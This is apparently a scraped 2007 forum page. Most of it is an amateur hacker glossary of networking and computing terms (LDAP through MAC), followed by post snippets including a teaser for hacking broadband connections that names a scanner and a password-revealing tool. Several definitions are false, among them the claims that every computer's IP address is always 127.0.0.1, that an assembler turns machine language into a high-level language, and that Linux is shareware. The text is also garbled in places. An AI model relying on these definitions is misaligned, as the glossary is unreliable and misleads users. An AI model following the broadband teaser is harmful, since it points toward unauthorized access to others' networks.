>LDAP(Lightweight Directory Access Protocol.): An IETF protocol for creating, accessing and removing objects and data from a directory. It provides the ability to search, compare, add, delete and modify directory objects, as well as modifying the names of these objects. It also supports bind, unbind and abandon (cancel) operations for a session. LDAP got its name from its goal of being a simpler form of DAP (Directory Access Protocol), from the X.500 set of standards.
>LINK CONTROL PROTOCOL(LCP):a protocol used by ppp to establish, manage and terminate dial up networking.
>LINUX:is a shareware type version of unix with about 96 per cent of the same features. linux is widely used by programmers and hackers because of its security features and its open source. Hackers usually use linux because it supports all the major programming languages and because it has more power in networking than its rival o/s windows.
>LOCAL:is a computer which is in the same building as the other computers on a network,local hackers are hackers within the same network,remote hackers are hackers who hack in from a remote location such as from the other side of the country.
>LOCAL TALK:the connectors and cables which make up the apple talk network.
>LoD (Legion of Doom):Legendary hacker group of the 90's.
>.LOG:is a file which records every ip address which connects to a system and can record the presence of hackers in a system. logs are usually write protected and are the main cause of newbie hackers getting traced.
>LOG IN:to gain access to a computer by giving the correct id and password.
>LOG OFF:to log out of a computer system once you're logged in.
>LOGICAL ADDRESS:a network address configuration through the protocol software.
>LOGICAL LINK CONTROL SUBLAYER:a sublayer of OSI's datalayer that is responsible for error checking and managing links between services on a subnet.
>LOGO:is a programming language designed to show children how to work a pc.
>LOOPBACK ADDRESS:127.0.0.1 is referred to by every o/s as its own machine, for e.g. every computer's ip address is always 127.0.0.1.
>LOVE BUG:was a worm written by eyespider in visual basic. the lovebug exploited a loop hole in outlook express and then emailed itself to every user in the user's address book.
>LURKER:is someone who reads messages on usenet but doesn't contribute. almost 90% of users are lurkers.
>MCAFEE:is one of the world leaders in anti viral programs.
>MACHINE LANGUAGE:is the code which the computer understands, which is in binary. Aside from computers that utilize programmable micro code (which, by the way we're not covering) 'Machine Language' is the lowest level of programming languages. These are the only kind of language that computers recognise, although they are almost impossible to read to programmers, mainly because they consist of just numbers. When you write a program in a high level language such as Pascal, the compiler will convert your instructions into this so that the computer understands. And for information's sake, 'Machine Language' is converted to 'High-Level language' by an 'assembler'. Every CPU has its own unique machine language. Programs must be rewritten or recompiled, therefore, to run on different types of computers.
>MACINTOSH:is a make of o/s which started back in the 70's and is owned by apple corp.
>.MACRO:is a program written to record certain tasks and repeat them. macros are mainly used in MS OFFICE applications and are written in visual basic.
>MAIL BOMB:is a form of a DoS attack used by script kiddies to send ppl thousands of emails and block legitimate ones.
>MANDRAKE LINUX:is a linux distro based on redhat linux, with the same features, renowned for its newbie friendliness.
>.MAP:is to add a temporary drive to your pc, so that u can access another computer's hard drive on a network.
>MULTICAST:Allows datagrams to be delivered to a group of hosts simultaneously.
>MBIT(MEGA BIT):
>MBps:Acronym for megabytes per second. A measure of bandwidth or data transfer rate.
>MAC(MEDIA ACCESS CONTROL): Algorithms that control access to physical media, especially in shared media networkshis is a network setup…
- Added by Rajiv E-H 89 at 6:35pm on December 12, 2007
- Page: Shafihot's Tricks Hacking Cracking VirusWriting
- A simple Process to hack Broadband check it REQUIRED For hacking
BroadBand you will require *Angry ip scanner * Asterix Key 7.11 * A
Computer *An internet connection Download AngryIPScan and Asterix
k
- Added by shafihot at 11:05pm on November 25, 2007